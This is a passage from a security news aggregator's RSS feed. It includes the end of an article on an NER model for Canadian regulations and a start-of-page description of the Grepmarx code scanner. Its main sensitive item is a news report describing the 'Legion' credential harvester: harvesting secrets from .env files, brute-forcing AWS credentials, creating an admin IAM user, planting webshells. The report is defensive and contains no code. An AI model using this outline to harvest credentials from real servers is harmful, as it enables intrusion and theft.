vector from character-level features. For each word, these vectors are concatenated and fed to the BLSTM network and then to the output layers.” (From the <a href="https://arxiv.org/abs/1511.08308">paper</a>.)</figcaption></figure><p>And here’s the CNN side:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/530/1*Kb797_GA3EG8auGqDSQ5Ng.png"><figcaption>“[…] The convolutional neural network extracts character features from each word. The character embedding and (optionally) the character type feature vector are computed through lookup tables. Then, they are concatenated and passed into the CNN.” (From the <a href="https://arxiv.org/abs/1511.08308">paper</a>.)</figcaption></figure><p>for clarity, here’s a walkthrough of the model building code used in the project:</p><a href="https://medium.com/media/82da77440fdc7f5977f69b95f4efb137/href">https://medium.com/media/82da77440fdc7f5977f69b95f4efb137/href</a><p><em>Note: the rest of the code is under some weird licensing conversation with the client, so we’ll open-source it once we know what’s going on. Then again, just use transformers.</em></p><h4>The Results</h4><p>There were two categories of results we focused on:</p><ul><li>The general model performance; and</li><li>The usability of the tool for our client.</li></ul><p>The model results were acceptable given the context.</p><p>The overall F1-score of the model was 0.726 with the raw structure above. (For fun, a basic LSTM on the same dataset had an F1-score of 0.277, so an improvement for sure.)</p><p>Diving deeper into the utility of the model, we looked at 1. whether or not a reference was present (“O”), 2. if we could accurately predict the beginning of a reference (“B-ref”), and 3. can we detect that we are inside a reference (“I-ref”). This meant that we were closer to how an operator would improve their work by being indicated where a reference is present rather than optimizing for the start and stop of the identified segment. These results were much more promising:</p><a href="https://medium.com/media/3fca8d9d8453a11bdc16679592e77857/href">https://medium.com/media/3fca8d9d8453a11bdc16679592e77857/href</a><p><em>Also, for the keen observers stating that some of the false positives were higher: if you look at the resulting model performance, these could be described as true positives in the regulations. For instance, the model will highlight “the Code”, which is in relation to a previous mention of an IBR.</em></p><h3>Navigating the Regulatory Stock</h3><p>After the model pushed through all the regulations, it was then time to display the results somehow to search and identify the results.</p><p>While skipping over the details of accessibility and platform design (we used a Laravel frontend with a Flask backend — it was 2018, after all), we built a simple platform that could ingest the regulatory stock, search for regulations, and identify in context the specific incorporations by reference that existed inside the regulations.</p><p>This frontend was where a lot of requirements started getting clarified and adjusted as the clients saw what the tool could do.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*dwUg5svMO2pKZDaen48FFQ.png"><figcaption>A view of the SA/IBR portal, looking at the Regulations search page. Iamge by author.</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ozA0a7Ep9-izROS_fB9SBA.png"><figcaption>A view of the SA/IBR portal, looking at the Medical Device Regulations page. Image by author.</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/771/1*gCMp2omizZNGwc7x8rQi3A.png"><figcaption>A detailed view of the highlighting performed. This is in Section 9 of <strong>SOR-86–304: Canada Occupational Health and Safety Regulations. </strong>Image by author.</figcaption></figure><h3>Validation and Usability</h3><p>As we were closing off many of the features in the contract, we started noticing the limits of the content in the regulatory stock. that certain ancillary features could not be achieved due to insufficient candidate examples in the data. (For example, there was a line item tied to static vs. ambulatory references — usually referred to with a “<em>[…] the latest version of […]</em>” — but our initial search only found 5 examples of ambulatory references. )</p><p>Sometimes, in AI consulting, project delivery requires clarification once the data has been evaluated and the models built. In this case, many conversations were had about the utility of the tool against contract expectations (based on the reality of the data), which allowed us to whittle away at the platform and ensure that the code delivered actually addresses the regulation drafters’ core concerns.</p><p>On validating the core model (catching third-part references), a key question was simply: <em>does it work? </em>That question had many technical sublayers to it (with the <em>beginning</em> and <em>inner </em>metrics listed above), but the key business case was further clarified: <em>Does the tool allow a reviewer to identify *</em><strong><em>all* </em></strong><em>of the third-party references in a regulation?</em></p><p>The Justice Canada team performed multiple reviews of the results. After a few weeks of discussion, they confirmed that <strong>our tool had not missed a single incorporation by reference. </strong>We kept up post-project quality control to ensure no outstanding issues, but our work here was done. ❤️</p><p><strong><em>Disclaimer</em></strong><em>: This article is also about the prototype procurement list that was the precursor to the now-famous AI Supplier List of the Canadian Federal Government. The first </em><strong><em>actual </em></strong><em>project on the Canadian AI Supplier List was won by both </em><a href="https://buyandsell.gc.ca/procurement-data/tender-notice/PW-EE-017-34665"><em>KPMG and Lixar (now BDO)</em></a><em>; in no way are we claiming in this article that we won that particular project, or that we were the first ever AI project within the public function. However, there was a prototype procurement vehicle for the adoption of AI technologies that came out before the AI supplier list where we delivered a very interesting approach. This is the story of that project.</em></p><h3>Other articles you may enjoy</h3><ul><li><a href="https://medium.com/towards-data-science/interpreting-the-business-considerations-of-mlops-f32613c4bcb4">Interpreting the Business Considerations of MLOps</a></li><li><a href="https://towardsdatascience.com/pytorch-vs-tensorflow-for-transformer-based-nlp-applications-b851bdbf229a">PyTorch vs. TensorFlow for Transformer-Based NLP Applications</a></li><li><a href="https://towardsdatascience.com/mlops-for-batch-processing-running-airflow-on-gpus-dc94367869c6">MLOps for Batch Processing: Running Airflow on GPUs</a></li><li><a href="https://towardsdatascience.com/dataset-biases-institutionalized-discrimination-or-adequate-transparency-ae4119e2a65c">Dataset Biases: Institutionalized Discrimination or Adequate Transparency?</a></li><li><a href="https://medium.com/@lsci/how-does-artificial-intelligence-create-value-bec14c785b40">How Does AI Create Value?</a></li><li><a href="https://towardsdatascience.com/implementing-a-corporate-ai-strategy-a64e641384c8">Implementing a Corporate AI Strategy</a></li><li><a href="https://towardsdatascience.com/outlier-aware-clustering-beyond-k-means-76f7bf8b4899">Outlier-Aware Clustering: Beyond K-Means</a></li><li><a href="https://towardsdatascience.com/rorschach-tests-for-deep-learning-image-classifiers-68c019fcc9a9">Rorschach Tests for Deep Learning Image Classifiers</a></li></ul><p><em>If you have additional questions about this article or our AI consulting, feel free to reach out via </em><a href="https://www.linkedin.com/in/mnlemay/"><strong><em>LinkedIn</em></strong></a><strong><em> </em></strong><em>or by </em><a href="mailto:matt@lemay.ai"><strong><em>email</em></strong></a><em>.</em></p><p>-Matt.</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=8c67e58c22f0" width="1" height="1" alt=""><hr><p><a href="https://towardsdatascience.com/how-we-won-our-first-government-ai-project-8c67e58c22f0">How We Won Our First Government AI Project</a> was originally published in <a href="https://towardsdatascience.com/">Towards Data Science</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Developer Snapshots: Programmierer-News in ein, zwei Sätzen]]></title>
<description><![CDATA[Unsere Übersicht kleiner, interessanter Meldungen enthält unter anderem Laravel, Ember.js, Autometrics, .NET 8, Eclipse Theia und Appwrite.]]></description>
<link>https://tsecurity.de/de/1866082/it-nachrichten/developer-snapshots-programmierer-news-in-ein-zwei-saetzen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1866082/it-nachrichten/developer-snapshots-programmierer-news-in-ein-zwei-saetzen/</guid>
<pubDate>Fri, 14 Apr 2023 16:51:00 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Unsere Übersicht kleiner, interessanter Meldungen enthält unter anderem Laravel, Ember.js, Autometrics, .NET 8, Eclipse Theia und Appwrite.]]></content:encoded>
</item>
<item>
<title><![CDATA[Meet ‘Legion’: The New Python-Based Credential Harvester and SMTP Hijacking Tool]]></title>
<description><![CDATA[Meet ‘Legion’: The New Python-Based Credential Harvester and SMTP Hijacking Tool
				
				
			
			
				
				
				
				
			
				
				
				
				
				
				
				
				
				
				
				
				 Post Views: 8
			
			
				
				
				
				
				 
			
			
				
				
				
				
			
				
				
				
				
				
				
		...]]></description>
<link>https://tsecurity.de/de/1865618/hacking/meet-legion-the-new-python-based-credential-harvester-and-smtp-hijacking-tool/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1865618/hacking/meet-legion-the-new-python-based-credential-harvester-and-smtp-hijacking-tool/</guid>
<pubDate>Fri, 14 Apr 2023 12:17:16 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="et_pb_section et_pb_section_0 et_section_specialty">
				
				
				
				
				
				<div class="et_pb_row">
				<div class="et_pb_column et_pb_column_3_4 et_pb_column_0   et_pb_specialty_column  et_pb_css_mix_blend_mode_passthrough">
				
				
				
				
				<div class="et_pb_row_inner et_pb_row_inner_0">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_0 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_post_title et_pb_post_title_0 et_pb_bg_layout_light  et_pb_text_align_left">
				
				
				
				
				
				<div class="et_pb_title_container">
					<h1 class="entry-title">Meet ‘Legion’: The New Python-Based Credential Harvester and SMTP Hijacking Tool</h1>
				</div>
				
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_1">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_1 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_0  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong><div class="post-views content-post post-272443 entry-meta">
				<span class="post-views-icon dashicons dashicons-chart-bar"></span> <span class="post-views-label">Post Views:</span> <span class="post-views-count">8</span>
			</div></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_1  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><!-- News Adsense Adcode --><ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400" data-ad-format="auto" data-full-width-responsive="true"></ins> </div>
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_2 patreon-row">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_2 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_divider et_pb_divider_0 et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div><div class="et_pb_module et_pb_text et_pb_text_2  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2 class="premium-content">Premium Content</h2></div>
			</div><div class="et_pb_module et_pb_image et_pb_image_0">
				
				
				
				
				<a href="http://patreon.com/posts/burp-suite-how-5-56263320" target="_blank"><span class="et_pb_image_wrap "><img decoding="async" width="500" height="150" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2022/12/Patreon.png" alt="Patreon" title="Patreon" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2022/12/Patreon.png 500w, https://www.blackhatethicalhacking.com/wp-content/uploads/2022/12/Patreon-480x144.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 500px, 100vw" class="wp-image-269595"></span></a>
			</div><div class="et_pb_module et_pb_text et_pb_text_3  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner">Subscribe to <a class="green_color" href="http://patreon.com/posts/burp-suite-how-5-56263320" target="_blank" rel="noopener sponsored">Patreon</a> to watch this episode.</div>
			</div><div class="et_pb_module et_pb_divider et_pb_divider_1 et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_3">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_3 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_4  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner">Reading Time: 3 Minutes</div>
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_4">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_4 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_5  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p>A new tool called ‘Legion’ has emerged in the world of cybercrime, offering a range of modules for credential harvesting and SMTP hijacking. Cybercriminals operating under the “Forza Tools” name sell this Python-based tool on Telegram, attracting over a thousand members on their channel.</p>
<p><img decoding="async" class="aligncenter" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Malware/25/youtube.jpg" alt="Forza Tools tutorials on YouTube" width="881" height="549"><strong>Forza Tools tutorials on YouTube</strong> <em>(Cado)</em></p>
<h2><strong>Harvesting credentials</strong></h2>
<p>Legion is modular malware likely based on AndroxGhOst, allowing cybercriminals to perform SMTP server enumeration, exploit vulnerable Apache versions, brute-force cPanel and WebHost Manager accounts, interact with Shodan’s API, and abuse AWS services. This tool targets many online services, including Twilio, Nexmo, Stripe/Paypal, AWS console credentials, AWS SNS, S3 and SES specific, Mailgun, and database/CMS platforms. Additionally, Legion can create administrator users, implant webshells, and send out spam SMS to customers of U.S. carriers.</p>
<p><img decoding="async" class="aligncenter" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Malware/25/services.jpg" alt="All services targeted by Legion" width="626" height="600"><br><strong>All services targeted by Legion</strong> <em>(Cado)</em></p>
<p>Legion mainly targets unsecured web servers running content management systems and PHP-based frameworks like Laravel, using RegEx patterns to search for files commonly known to hold secrets, authentication tokens, and API keys. Cybercriminals use an array of methods to retrieve credentials, such as targeting environment variable files (.env) and configuration files containing SMTP, AWS console, Mailgun, Twilio, and Nexmo credentials.</p>
<p><img decoding="async" class="b-lazy b-loaded" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Malware/25/paths.jpg" alt="Paths parsed by Legion for stored secrets" width="910" height="434"><strong>Paths parsed by Legion for stored secrets</strong> <em>(Cado)</em></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_6 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>See Also: So you want to be a hacker?<br></strong><strong><a href="https://www.blackhatethicalhacking.com/courses/" target="_blank" rel="noopener noreferrer">Offensive Security, Bug Bounty Courses</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_7  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><!-- News Adsense Adcode --><ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400" data-ad-format="auto" data-full-width-responsive="true"></ins> </div>
			</div><div class="et_pb_module et_pb_text et_pb_text_8  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2><strong>How Legion Extracts Credentials and Performs Spam and Phishing Attacks</strong></h2>
<p>Furthermore, Legion includes brute-forcing systems for AWS and SendGrid credentials, although Cado indicates that the former’s system is unlikely to generate usable credentials in its current state. Once Legion captures valid AWS credentials, it attempts to create an IAM user named ‘ses_legion’ with administrator rights, granting full access to all AWS services and resources.</p>
<p><img decoding="async" class="b-lazy b-loaded aligncenter" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Malware/25/aws-brute.jpg" alt="Code to brute-force AWS credentials" width="906" height="502"><strong>Code to brute-force AWS credentials</strong> <em>(Cado)</em></p>
<p>In addition to stealing credentials, Legion can send out spam or phishing emails by gaining access to email services. It can also send SMS spam by leveraging stolen SMTP credentials after generating a list of phone numbers with area codes retrieved from online services. The carriers supported by the malware include AT&amp;T, Sprint, US Cellular, T-Mobile, Cricket, Verizon, Virgin, SunCom, Alltel, Cingular, and VoiceStream.</p>
<p>Lastly, Legion can exploit known PHP vulnerabilities to register a webshell on the targeted endpoint or perform remote code execution to give the attacker full access to the server.</p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_9 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/articles/the-rise-and-fall-of-sabu-from-hacker-hero-to-fbi-informant/" target="_blank" rel="noopener noreferrer">The Rise and Fall of Sabu: From Hacker Hero to FBI Informant<br></a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_10  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><!-- News Adsense Adcode --><ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400" data-ad-format="auto" data-full-width-responsive="true"></ins> </div>
			</div><div class="et_pb_module et_pb_text et_pb_text_11 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/tools/mythic/" target="_blank" rel="noopener noreferrer">Offensive Security Tool: Mythic<br></a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_12  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><div class="group w-full text-gray-800 dark:text-gray-100 border-b border-black/10 dark:border-gray-900/50 bg-gray-50 dark:bg-[#444654]">
<div class="text-base gap-4 md:gap-6 md:max-w-2xl lg:max-w-xl xl:max-w-3xl p-4 md:py-6 flex lg:px-0 m-auto">
<div class="relative flex w-[calc(100%-50px)] flex-col gap-1 md:gap-3 lg:w-[calc(100%-115px)]">
<div class="flex flex-grow flex-col gap-3">
<div class="min-h-[20px] flex flex-col items-start gap-4 whitespace-pre-wrap">
<div class="markdown prose w-full break-words dark:prose-invert dark">
<div class="group w-full text-gray-800 dark:text-gray-100 border-b border-black/10 dark:border-gray-900/50 bg-gray-50 dark:bg-[#444654]">
<div class="text-base gap-4 md:gap-6 md:max-w-2xl lg:max-w-xl xl:max-w-3xl p-4 md:py-6 flex lg:px-0 m-auto">
<div class="relative flex w-[calc(100%-50px)] flex-col gap-1 md:gap-3 lg:w-[calc(100%-115px)]">
<div class="flex flex-grow flex-col gap-3">
<div class="min-h-[20px] flex flex-col items-start gap-4 whitespace-pre-wrap">
<div class="markdown prose w-full break-words dark:prose-invert dark">
<div class="group w-full text-gray-800 dark:text-gray-100 border-b border-black/10 dark:border-gray-900/50 bg-gray-50 dark:bg-[#444654]">
<div class="text-base gap-4 md:gap-6 md:max-w-2xl lg:max-w-xl xl:max-w-3xl p-4 md:py-6 flex lg:px-0 m-auto">
<div class="relative flex w-[calc(100%-50px)] flex-col gap-1 md:gap-3 lg:w-[calc(100%-115px)]">
<div class="flex flex-grow flex-col gap-3">
<div class="min-h-[20px] flex flex-col items-start gap-4 whitespace-pre-wrap">
<div class="markdown prose w-full break-words dark:prose-invert dark">
<h2><strong>AWS users – signs of compromise</strong></h2>
<p>As an all-purpose credential harvester and hacking tool, Legion increases the risk for poorly managed and misconfigured web servers. AWS users should look for signs of compromise, such as changing the IAM user registration code to include an “Owner” tag with the value “ms.boharas.” The emergence of Legion underscores the importance of strengthening online security measures to prevent cyberattacks.</p>
<p><img decoding="async" class="b-lazy b-loaded aligncenter" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Malware/25/policy.jpg" alt="IAM policy creation" width="483" height="562"><strong>IAM policy creation</strong> <em>(Cado)</em></p>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="group w-full text-gray-800 dark:text-gray-100 border-b border-black/10 dark:border-gray-900/50 dark:bg-gray-800">
<div class="text-base gap-4 md:gap-6 md:max-w-2xl lg:max-w-xl xl:max-w-3xl p-4 md:py-6 flex lg:px-0 m-auto">
<div class="w-[30px] flex flex-col relative items-end">
<div class="relative flex"> </div>
</div>
</div>
</div></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_13 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/news/10-year-old-windows-vulnerability-still-being-exploited-in-the-3cx-attacks/" target="_blank" rel="noopener noreferrer">10-Year-Old Windows vulnerability still being exploited in the 3CX attacks</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_14  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><blockquote><p><em>Are u a security researcher? Or a company that writes articles or write ups about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing?</em></p>
<p><em>If you want to express your idea in an article contact us here for a quote: <strong>info@blackhatethicalhacking.com</strong></em></p></blockquote></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_15  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong><em>Source: bleepingcomputer.com</em></strong></p>
<p><a href="https://www.bleepingcomputer.com/news/security/legion-new-hacktool-steals-credentials-from-misconfigured-sites/" target="_blank" rel="noopener"><strong>Source Link</strong></a></p></div>
			</div><div class="et_pb_module et_pb_divider et_pb_divider_2 et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div><div class="et_pb_module et_pb_image et_pb_image_1 store-img">
				
				
				
				
				<a href="https://store.blackhatethicalhacking.com/" target="_blank"><span class="et_pb_image_wrap "><img decoding="async" width="1142" height="500" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store.png" alt="Merch" title="Store" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store.png 1142w, https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store-980x429.png 980w, https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store-480x210.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 1142px, 100vw" class="wp-image-271829"></span></a>
			</div>
			</div>
				
				
				
				
			</div>
			</div><div class="et_pb_column et_pb_column_1_4 et_pb_column_1    et_pb_css_mix_blend_mode_passthrough">
				
				
				
				
				<div class="et_pb_module et_pb_sidebar_0 news-sidebar1 et_pb_widget_area clearfix et_pb_widget_area_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_widget rpwe_widget recent-posts-extended"><h4 class="widgettitle">Recent News</h4><div class="rpwe-block news-recent-posts-sb"><ul class="rpwe-ul"><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/new-generation-of-botnets-builds-high-performance-vps-based-ddos-attacks/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/04/Images-for-the-News-posts-15-300x150.png" alt="New generation of botnets builds high-performance VPS-based DDoS attacks" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/new-generation-of-botnets-builds-high-performance-vps-based-ddos-attacks/" target="_self">New generation of botnets builds high-performance VPS-based DDoS attacks</a></h3><time class="rpwe-time published" datetime="2023-04-13T11:36:28+02:00">April 13, 2023</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/microsoft-patches-windows-zero-day-exploited-to-spread-ransomware/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/04/Images-for-the-News-posts-14-300x150.png" alt="Microsoft Patches Windows Zero-Day Exploited to Spread Ransomware" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/microsoft-patches-windows-zero-day-exploited-to-spread-ransomware/" target="_self">Microsoft Patches Windows Zero-Day Exploited to Spread Ransomware</a></h3><time class="rpwe-time published" datetime="2023-04-12T10:27:32+02:00">April 12, 2023</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/over-one-million-wordpress-websites-infected-with-balada-injector-malware-campaign/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/04/Images-for-the-News-posts-13-300x150.png" alt="Over One Million WordPress Websites Infected with Balada Injector Malware Campaign" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/over-one-million-wordpress-websites-infected-with-balada-injector-malware-campaign/" target="_self">Over One Million WordPress Websites Infected with Balada Injector Malware Campaign</a></h3><time class="rpwe-time published" datetime="2023-04-11T09:46:49+02:00">April 11, 2023</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/apple-releases-emergency-security-updates-to-address-zero-day-vulnerabilities-on-iphones-macs-and-ipads/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/04/Images-for-the-News-posts-12-300x150.png" alt="Apple releases emergency security updates to address zero-day vulnerabilities on iPhones, Macs, and iPads" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/apple-releases-emergency-security-updates-to-address-zero-day-vulnerabilities-on-iphones-macs-and-ipads/" target="_self">Apple releases emergency security updates to address zero-day vulnerabilities on iPhones, Macs, and iPads</a></h3><time class="rpwe-time published" datetime="2023-04-10T09:48:42+02:00">April 10, 2023</time><div class="rpwe-summary"></div></li></ul></div><!-- Generated by http://wordpress.org/plugins/recent-posts-widget-extended/ --></div><div class="widget_text et_pb_widget widget_custom_html"><div class="textwidget custom-html-widget"><!-- News Adsense Adcode --><ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400" data-ad-format="auto" data-full-width-responsive="true"></ins> </div></div>
			</div><div class="et_pb_module et_pb_sidebar_1 news-sidebar2 et_animated et_pb_widget_area clearfix et_pb_widget_area_left  et_pb_text_align_justified et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_widget widget_block"><a href="https://www.blackhatethicalhacking.com/courses/"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2022/06/OffSec-Course.png"></a>
<h3>Offensive Security &amp; Ethical Hacking Course</h3>
<p>Begin the learning curve of hacking now!</p>
</div><div class="et_pb_widget widget_block"><hr><a href="https://www.blackhatethicalhacking.com/solutions/"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Solutions.png"></a>
<h3>Information Security Solutions</h3>
<p>Find out how Pentesting Services can help you.</p></div>
			</div>
			</div>
				</div>
				
			</div>The post <a href="https://www.blackhatethicalhacking.com/news/meet-legion-the-new-python-based-credential-harvester-and-smtp-hijacking-tool/">Meet ‘Legion’: The New Python-Based Credential Harvester and SMTP Hijacking Tool</a> first appeared on <a href="https://www.blackhatethicalhacking.com/">Black Hat Ethical Hacking</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Grepmarx - A Source Code Static Analysis Platform For AppSec Enthusiasts]]></title>
<description><![CDATA[Grepmarx is a web application providing a single platform to quickly understand, analyze and identify vulnerabilities in possibly large and unknown code bases.  Features  SAST (Static Analysis Security Testing) capabilities:  Multiple languages support: C/C++, C#, Go, HTML, Java, Kotlin, JavaScri...]]></description>
<link>https://tsecurity.de/de/1850715/it-security-nachrichten/grepmarx-a-source-code-static-analysis-platform-for-appsec-enthusiasts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1850715/it-security-nachrichten/grepmarx-a-source-code-static-analysis-platform-for-appsec-enthusiasts/</guid>
<pubDate>Wed, 05 Apr 2023 16:05:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh7Yy2NHRYGzMagJOQ6cHb5NxYMsB8n31GgsUcu4FcJtKVP0bmHv80VuQUfBv514kdaIYbnQeK9iVIsnfE975ryYevwPFexVQcvGfqcAnhgWW8bx-ODlXiMsyt9CraBU37drT6--ENZQ1nfbHTywSNVhJz7uKNkrf7dI9uhkyKveJy--rf7br3-f27YGQ"><img alt="" border="0" height="178" src="https://blogger.googleusercontent.com/img/a/AVvXsEh7Yy2NHRYGzMagJOQ6cHb5NxYMsB8n31GgsUcu4FcJtKVP0bmHv80VuQUfBv514kdaIYbnQeK9iVIsnfE975ryYevwPFexVQcvGfqcAnhgWW8bx-ODlXiMsyt9CraBU37drT6--ENZQ1nfbHTywSNVhJz7uKNkrf7dI9uhkyKveJy--rf7br3-f27YGQ=w640-h178" width="640"></a></p>  <p dir="auto"><br></p><p dir="auto">Grepmarx is a web application providing a single platform to quickly understand, analyze and identify <a href="https://www.kitploit.com/search/label/vulnerabilities" target="_blank" title="vulnerabilities">vulnerabilities</a> in possibly large and unknown code bases.</p>  <h2 dir="auto" tabindex="-1">Features</h2>  <p dir="auto">SAST (Static Analysis Security Testing) capabilities:</p>  <ul dir="auto"><li>Multiple languages support: C/C++, C#, Go, HTML, Java, Kotlin, JavaScript, TypeScript, OCaml, PHP, Python, Ruby, Bash, Rust, Scala, Solidity, Terraform, Swift</li>  <li>Multiple <a href="https://www.kitploit.com/search/label/Frameworks" target="_blank" title="frameworks">frameworks</a> support: Spring, Laravel, Symfony, Django, Flask, Node.js, jQuery, Express, Angular...</li>  <li>1600+ existing analysis rules</li>  <li>Easily extend analysis rules using Semgrep syntax: <a href="https://semgrep.dev/editor" rel="nofollow" target="_blank" title="https://semgrep.dev/editor">https://semgrep.dev/editor</a></li>  <li>Manage rules in rule packs to tailor code scanning</li>  </ul><p dir="auto">SCA (Software Composition Analysis) capabilities:</p>  <ul dir="auto"><li>Multiple package-dependency formats support: NPM, Maven, Gradle, Composer, pip, Gopkg, Gem, Cargo, NuPkg, CSProj, PubSpec, Cabal, Mix, Conan, Clojure, Docker, GitHub Actions, Jenkins HPI, Kubernetes</li>  <li>SBOM (Software Bill-of-Materials) generation (CycloneDX compliant)</li>  </ul><p dir="auto">Extra</p>  <ul dir="auto"><li>Analysis 